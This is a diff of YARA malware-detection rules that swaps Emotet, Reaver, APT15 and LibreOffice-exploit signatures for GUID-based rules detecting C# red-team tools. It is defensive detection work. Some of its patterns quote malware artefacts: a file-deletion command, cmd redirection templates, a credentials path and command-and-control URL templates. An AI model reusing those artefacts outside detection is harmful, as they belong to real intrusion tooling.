-		uint16( 0 ) == 0x5a4d and filesize <= 200KB and ( pe.imphash ( ) == "009889c73bd2e55113bf6dfa5f395e0d" or 1 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_Emotet_BKA_Quarantine_Apr21
+rule SIGNATURE_BASE_HKTL_NET_GUID_Shellcodeloader : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "press inquiries <info@bka.de>, technical contact <info@mha.bka.de>"
-		id = "22c27d82-00cb-5d2f-a1cc-9f8b4c60aecd"
-		date = "2021-03-23"
-		modified = "2023-12-05"
-		reference = "https://www.bka.de/DE/IhreSicherheit/RichtigesVerhalten/StraftatenImInternet/FAQ/FAQ_node.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_emotet.yar#L39-L52"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b8787dac-48a3-5711-86ba-0fda86b6224e"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/Hzllaga/ShellcodeLoader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L654-L668"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cc75be5f641e21446a41bf9cc855330a612847e7e3a3be935577d33195f40d05"
+		logic_hash = "c8a36476d087b82e96ea60de1a9879b261d533fb148c44a2e6544fdaa7c574e6"
 		score = 75
 		quality = 85
-		tags = ""
-		descripton = "The modified emotet binary replaces the original emotet on the system of the victim. The original emotet is copied to a quarantine for evidence-preservation."
-		note = "The quarantine folder depends on the scope of the initial emotet infection (user or administrator). It is the temporary folder as returned by GetTempPathW under a filename starting with UDP as returned by GetTempFileNameW. To prevent accidental reinfection by a user, the quarantined emotet is encrypted using RC4 and a 0x20 bytes long key found at the start of the quarantined file (see $key)."
-		sharing = "TLP:WHITE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$key = { c3 da da 19 63 45 2c 86 77 3b e9 fd 24 64 fb b8 07 fe 12 d0 2a 48 13 38 48 68 e8 ae 91 3c ed 82 }
+		$typelibguid0lo = "a48fe0e1-30de-46a6-985a-3f2de3c8ac96" ascii wide
+		$typelibguid0up = "A48FE0E1-30DE-46A6-985A-3F2DE3C8AC96" ascii wide
 
 	condition:
-		$key at 0
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_Emotet_BKA_Cleanup_Apr21 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Keystrokeapi : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "press inquiries <info@bka.de>, technical contact <info@mha.bka.de>"
-		id = "10d93918-8a5e-54a3-81c6-f6ff68562e13"
-		date = "2021-03-23"
-		modified = "2023-12-05"
-		reference = "https://www.bka.de/DE/IhreSicherheit/RichtigesVerhalten/StraftatenImInternet/FAQ/FAQ_node.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_emotet.yar#L54-L70"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e715bce8-531b-5e2a-bd02-b2fc4990c499"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/fabriciorissetto/KeystrokeAPI"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L670-L686"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "533adaed96d015ea2dcd54d5aaf9e71b5b70430ed5733a98618925cf978a6515"
+		logic_hash = "e638c173817ce6e1b59bfd897ba3d45e24a5c1020014999e2ad21afcd4f21291"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		descripton = "This rule targets a modified emotet binary deployed by the Bundeskriminalamt on the 26th of January 2021."
-		note = "The binary will replace the original emotet by copying it to a quarantine. It also contains a routine to perform a self-deinstallation on the 25th of April 2021. The three-month timeframe between rollout and self-deinstallation was chosen primarily for evidence purposes as well as to allow remediation."
-		sharing = "TLP:WHITE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$key = { c3 da da 19 63 45 2c 86 77 3b e9 fd 24 64 fb b8 07 fe 12 d0 2a 48 13 38 48 68 e8 ae 91 3c ed 82 }
+		$typelibguid0lo = "f6fec17e-e22d-4149-a8a8-9f64c3c905d3" ascii wide
+		$typelibguid0up = "F6FEC17E-E22D-4149-A8A8-9F64C3C905D3" ascii wide
+		$typelibguid1lo = "b7aa4e23-39a4-49d5-859a-083c789bfea2" ascii wide
+		$typelibguid1up = "B7AA4E23-39A4-49D5-859A-083C789BFEA2" ascii wide
 
 	condition:
-		filesize > 300KB and filesize < 700KB and uint16( 0 ) == 0x5A4D and $key
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_Reaver3_Malware_Nov17_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Shellcoderunner : FILE
 {
 	meta:
-		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "95419d6f-b657-53c4-840d-9a9e9b00787e"
-		date = "2017-11-11"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_reaver_sunorcal.yar#L14-L27"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "949364e7-dcb6-5afd-ade9-cc34a6e15e97"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/antman1p/ShellCodeRunner"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L688-L704"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa141a1d3868bd4a004794bf51dc20086eb2e1446e1fa374834a6f2d84940c0d"
+		logic_hash = "48dfe2ea9b3ff1ae22c5436b8cb3f3f48658032c94463e2babeb6894ce3c666f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1813f10bcf74beb582c824c64fff63cb150d178bef93af81d875ca84214307a1"
 
 	strings:
-		$s1 = "CPL.dll" fullword ascii
+		$typelibguid0lo = "634874b7-bf85-400c-82f0-7f3b4659549a" ascii wide
+		$typelibguid0up = "634874B7-BF85-400C-82F0-7F3B4659549A" ascii wide
+		$typelibguid1lo = "2f9c3053-077f-45f2-b207-87c3c7b8f054" ascii wide
+		$typelibguid1up = "2F9C3053-077F-45F2-B207-87C3C7B8F054" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "e722dd50a0e2bc0cab8ca35fc4bf6d99" and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_Reaver3_Malware_Nov17_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Offensivecsharp : FILE
 {
 	meta:
-		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "423ae050-5087-528e-be0a-c612024dc70a"
-		date = "2017-11-11"
-		modified = "2023-01-06"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_reaver_sunorcal.yar#L29-L53"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "339f6858-6076-5320-ba5f-2903e642ea42"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/diljith369/OffensiveCSharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L706-L742"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f987876dae35d17fb3ac0d4d3cfe1e00f8977aa696194cc48e53ac1db9d55fca"
+		logic_hash = "8b3f8652b88b353d4fc162f93b373d5beeaaca1b1ebbeaef07a46d859aef4c12"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		hash1 = "9213f70bce491991c4cbbbd7dc3e67d3a3d535b965d7064973b35c50f265e59b"
-		hash2 = "98eb5465c6330b9b49df2e7c9ad0b1164aa5b35423d9e80495a178eb510cdc1c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "WindowsUpdateReaver" fullword wide
-		$s1 = "\\WUpdate.~tmp" ascii
-		$s2 = "\\~WUpdate.lnk" ascii
-		$s3 = "\\services\\" ascii
-		$s4 = "moomjufps" fullword ascii
-		$s5 = "gekmomkege" fullword ascii
+		$typelibguid0lo = "6c3fbc65-b673-40f0-b1ac-20636df01a85" ascii wide
+		$typelibguid0up = "6C3FBC65-B673-40F0-B1AC-20636DF01A85" ascii wide
+		$typelibguid1lo = "2bad9d69-ada9-4f1e-b838-9567e1503e93" ascii wide
+		$typelibguid1up = "2BAD9D69-ADA9-4F1E-B838-9567E1503E93" ascii wide
+		$typelibguid2lo = "512015de-a70f-4887-8eae-e500fd2898ab" ascii wide
+		$typelibguid2up = "512015DE-A70F-4887-8EAE-E500FD2898AB" ascii wide
+		$typelibguid3lo = "1ee4188c-24ac-4478-b892-36b1029a13b3" ascii wide
+		$typelibguid3up = "1EE4188C-24AC-4478-B892-36B1029A13B3" ascii wide
+		$typelibguid4lo = "5c6b7361-f9ab-41dc-bfa0-ed5d4b0032a8" ascii wide
+		$typelibguid4up = "5C6B7361-F9AB-41DC-BFA0-ED5D4B0032A8" ascii wide
+		$typelibguid5lo = "048a6559-d4d3-4ad8-af0f-b7f72b212e90" ascii wide
+		$typelibguid5up = "048A6559-D4D3-4AD8-AF0F-B7F72B212E90" ascii wide
+		$typelibguid6lo = "3412fbe9-19d3-41d8-9ad2-6461fcb394dc" ascii wide
+		$typelibguid6up = "3412FBE9-19D3-41D8-9AD2-6461FCB394DC" ascii wide
+		$typelibguid7lo = "9ea4e0dc-9723-4d93-85bb-a4fcab0ad210" ascii wide
+		$typelibguid7up = "9EA4E0DC-9723-4D93-85BB-A4FCAB0AD210" ascii wide
+		$typelibguid8lo = "6d2b239c-ba1e-43ec-8334-d67d52b77181" ascii wide
+		$typelibguid8up = "6D2B239C-BA1E-43EC-8334-D67D52B77181" ascii wide
+		$typelibguid9lo = "42e8b9e1-0cf4-46ae-b573-9d0563e41238" ascii wide
+		$typelibguid9up = "42E8B9E1-0CF4-46AE-B573-9D0563E41238" ascii wide
+		$typelibguid10lo = "0d15e0e3-bcfd-4a85-adcd-0e751dab4dd6" ascii wide
+		$typelibguid10up = "0D15E0E3-BCFD-4A85-ADCD-0E751DAB4DD6" ascii wide
+		$typelibguid11lo = "644dfd1a-fda5-4948-83c2-8d3b5eda143a" ascii wide
+		$typelibguid11up = "644DFD1A-FDA5-4948-83C2-8D3B5EDA143A" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "837cc5062a0758335b257ea3b27972b2" or 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_Reaver3_Malware_Nov17_3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_SHAPESHIFTER : FILE
 {
 	meta:
-		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cc2511a9-8938-5f4d-9802-f73e44609bf9"
-		date = "2017-11-11"
-		modified = "2023-01-06"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_reaver_sunorcal.yar#L55-L80"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8903c65a-624f-5e8d-a3f6-4572b56bd2f7"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/matterpreter/SHAPESHIFTER"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L744-L758"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "32654255102aee872402b0910422701f3cd4d0b2b8fc6e83440f325923ab9e2f"
+		logic_hash = "9c53ead8bc93f874b9fab11be0e281fa11f2c590a4c9e649d67eed84de79783d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "18ac3b14300ecfeed4b64a844c16dccb06b0e3513d0954d6c6182f2ea14e4c92"
-		hash2 = "c0f8bb77284b96e07cab1c3fab8800b1bbd030720c74628c4ee5666694ef903d"
-		hash3 = "c906250e0a4c457663e37119ebe1efa1e4b97eef1d975f383ac3243f9f09908c"
-		hash4 = "1fcda755e8fa23d27329e4bc0443a82e1c1e9a6c1691639db256a187365e4db1"
-		hash5 = "d560f44188fb56d3abb11d9508e1167329470de19b811163eb1167534722e666"
 
 	strings:
-		$s1 = "winhelp.dat" fullword ascii
-		$s2 = "\\microsoft\\Credentials\\" ascii
-		$s3 = "~Update.lnk" fullword ascii
-		$s4 = "winhelp.cpl" fullword ascii
-		$s5 = "\\services\\" ascii
+		$typelibguid0lo = "a3ddfcaa-66e7-44fd-ad48-9d80d1651228" ascii wide
+		$typelibguid0up = "A3DDFCAA-66E7-44FD-AD48-9D80D1651228" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "8ee521b2316ddd6af1679eac9f5ed77b" or 4 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Sunorcal_Malware_Nov17_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Evasor : FILE
 {
 	meta:
-		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d8a21570-d1d6-52c3-abb2-ecaa86eb7ff0"
-		date = "2017-11-11"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_reaver_sunorcal.yar#L82-L104"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "457959ed-3e90-52c7-89f9-e1b17b35260e"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/cyberark/Evasor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L760-L774"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "88e6280c04b12b1d8530bafb44afc180685550f1f6bcefb731b3247f6a9529a2"
+		logic_hash = "69bda55c5a1c8f432c582066eab5efb2aa443fbf0a73e7c4d16d7e987cf1db2e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cb7c0cf1750baaa11783e93369230ee666b9f3da7298e4d1bb9a07af6a439f2f"
-		hash2 = "799139b5278dc2ac24279cc6c3db44f4ef0ea78ee7b721b0ace38fd8018c51ac"
-		hash3 = "38ea33dab0ba2edd16ecd98cba161c550d1036b253c8666c4110d198948329fb"
 
 	strings:
-		$x1 = "kQZ6l5t1kAlsjmBzsCZPrSpQn5tFrChLtTdsgTlOsClKt5pBsDdFrSVshnxMr6ZOpn9slndBsy1jq6lIr216rSNApn9P" fullword ascii
-		$x2 = { 00 00 00 00 00 00 00 00 00 00 00 00 21 21 21 73
-              79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 00 }
-		$x3 = "!!!url!!!" fullword ascii
-		$x4 = "h4NcbkdLrCpFpPQ=" fullword ascii
-		$x5 = "GloablCryptNv1" fullword ascii
-		$x6 = "Gloabl\\CryptNv1" fullword ascii
+		$typelibguid0lo = "1c8849ef-ad09-4727-bf81-1f777bd1aef8" ascii wide
+		$typelibguid0up = "1C8849EF-AD09-4727-BF81-1F777BD1AEF8" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EXP_Libre_Office_CVE_2018_16858 : CVE_2018_16858 FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Stracciatella : FILE
 {
 	meta:
-		description = "RCE in Libre Office with crafted ODT file (CVE-2018-16858)"
-		author = "John Lambert @JohnLaTwC / modified by Florian Roth"
-		id = "17a0a569-27bf-57ab-937e-8943442ae604"
-		date = "2019-02-01"
-		modified = "2023-12-05"
-		reference = "https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2018_16858.yar#L1-L17"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5b1a8102-6d59-5f2f-8ae2-b3c1f75a561d"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/mgeeky/Stracciatella"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L776-L790"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "95a02b70c117947ff989e3e00868c2185142df9be751a3fefe21f18fa16a1a6f"
-		logic_hash = "6dd34350f24945ba5a594acae96dc00bb200841a645443a70a59006cea1db949"
+		logic_hash = "bae17954d54753fe1ce9c04c16fc8bdf43c11994f53a13106441170e310dc3d5"
 		score = 75
-		quality = 83
-		tags = "CVE-2018-16858, FILE"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "xlink:href=\"vnd.sun.star.script:" ascii nocase
-		$s2 = ".py$tempfilepager" ascii nocase
-		$tag = {3c 6f 66 66 69 63 65 3a 64 6f 63 }
+		$typelibguid0lo = "eaafa0ac-e464-4fc4-9713-48aa9a6716fb" ascii wide
+		$typelibguid0up = "EAAFA0AC-E464-4FC4-9713-48AA9A6716FB" ascii wide
 
 	condition:
-		uint32be( 0 ) == 0x3c3f786d and $tag in ( 0 .. 0100 ) and all of ( $s* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT15_Malware_Mar18_Royalcli : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Logger : FILE
 {
 	meta:
-		description = "Detects malware from APT 15 report by NCC Group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "165bfa6c-1a8d-5628-8c35-da4e4a2ae04f"
-		date = "2018-03-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/HZ5XMN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L13-L32"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "82937fef-8280-5bc6-af4a-55c5cb3a7553"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/xxczaki/logger"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L792-L806"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "27fb5e8ff299201d1d13f4a45c401570f76ddfa4c3c1153eff50187170ada06e"
+		logic_hash = "0967d1278c72da256a647f45369d7ba4de8c17698d23d2e06d3723372a676634"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
 
 	strings:
-		$s1 = "\\Release\\RoyalCli.pdb" ascii
-		$s2 = "%snewcmd.exe" fullword ascii
-		$s3 = "Run cmd error %d" fullword ascii
-		$s4 = "%s~clitemp%08x.ini" fullword ascii
-		$s5 = "run file failed" fullword ascii
-		$s6 = "Cmd timeout %d" fullword ascii
-		$s7 = "2 %s  %d 0 %d" fullword ascii
+		$typelibguid0lo = "9e92a883-3c8b-4572-a73e-bb3e61cfdc16" ascii wide
+		$typelibguid0up = "9E92A883-3C8B-4572-A73E-BB3E61CFDC16" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_APT15_Malware_Mar18_Royaldns : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Internal_Monologue : FILE
 {
 	meta:
-		description = "Detects malware from APT 15 report by NCC Group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c2f519db-2750-53ce-ae18-697ea041faaf"
-		date = "2018-03-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/HZ5XMN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L34-L59"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ce2773a2-b0b7-560e-ba21-3f018ddcacb3"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/eladshamir/Internal-Monologue"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L808-L824"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5d42f48d7d816c0b0ea05145e9dd43b1b2589f3131bf286e1b39c0efaf1c6fac"
+		logic_hash = "5de43de183553732e48e41d17f441008f0637610d4c15f7f2012437b70750c2c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
 
 	strings:
-		$x1 = "del c:\\windows\\temp\\r.exe /f /q" fullword ascii
-		$x2 = "%s\\r.exe" fullword ascii
-		$s1 = "rights.dll" fullword ascii
-		$s2 = "\"%s\">>\"%s\"\\s.txt" fullword ascii
-		$s3 = "Nwsapagent" fullword ascii
-		$s4 = "%s\\r.bat" fullword ascii
-		$s5 = "%s\\s.txt" fullword ascii
-		$s6 = "runexe" fullword ascii
+		$typelibguid0lo = "0c0333db-8f00-4b68-b1db-18a9cacc1486" ascii wide
+		$typelibguid0up = "0C0333DB-8F00-4B68-B1DB-18A9CACC1486" ascii wide
+		$typelibguid1lo = "84701ace-c584-4886-a3cf-76c57f6e801a" ascii wide
+		$typelibguid1up = "84701ACE-C584-4886-A3CF-76C57F6E801A" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( ( pe.exports ( "RunInstallA" ) and pe.exports ( "RunUninstallA" ) ) or 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT15_Malware_Mar18_BS2005 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_GRAT2 : FILE
 {
 	meta:
-		description = "Detects malware from APT 15 report by NCC Group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "700bbe14-d79e-5a35-aab3-31eacd5bd950"
-		date = "2018-03-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/HZ5XMN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L61-L87"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e731d563-0d16-5f84-8127-624a71f8b646"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/r3nhat/GRAT2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L826-L840"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "306903da4ecc9f5bf670d8c49039dee0ce5500c185acaef74786a2c109a4734b"
+		logic_hash = "b4ac181d6bdb40eb58326c00c93ee6d6e78d7cbdb382422873d7f744ad0ec2a1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "750d9eecd533f89b8aa13aeab173a1cf813b021b6824bc30e60f5db6fa7b950b"
 
 	strings:
-		$x1 = "AAAAKQAASCMAABi+AABnhEBj8vep7VRoAEPRWLweGc0/eiDrXGajJXRxbXsTXAcZAABK4QAAPWwAACzWAAByrg==" fullword ascii
-		$x2 = "AAAAKQAASCMAABi+AABnhKv3kXJJousn5YzkjGF46eE3G8ZGse4B9uoqJo8Q2oF0AABK4QAAPWwAACzWAAByrg==" fullword ascii
-		$a1 = "http://%s/content.html?id=%s" fullword ascii
-		$a2 = "http://%s/main.php?ssid=%s" fullword ascii
-		$a3 = "http://%s/webmail.php?id=%s" fullword ascii
-		$a9 = "http://%s/error.html?tab=%s" fullword ascii
-		$s1 = "%s\\~tmp.txt" fullword ascii
-		$s2 = "%s /C %s >>\"%s\" 2>&1" fullword ascii
-		$s3 = "DisableFirstRunCustomize" fullword ascii
+		$typelibguid0lo = "5e7fce78-1977-444f-a18e-987d708a2cff" ascii wide
+		$typelibguid0up = "5E7FCE78-1977-444F-A18E-987D708A2CFF" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT15_Malware_Mar18_Msexchangetool : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Powershdll : FILE
 {
 	meta:
-		description = "Detects malware from APT 15 report by NCC Group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "81b826b6-8c2e-5a8a-a626-9515d40dbbb0"
-		date = "2018-03-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/HZ5XMN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L89-L106"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3f582a47-078e-525f-9d02-4ee7a455a3b2"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/p3nt4/PowerShdll"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L842-L856"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4e9e29bc69383ab6248241622394afddde6e18032ed6e2b64575362773f25a94"
+		logic_hash = "b000c10d55d7d8902c036306dd51a5f3d32b83e88c081f337140e448c2cd836e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "16b868d1bef6be39f69b4e976595e7bd46b6c0595cf6bc482229dbb9e64f1bce"
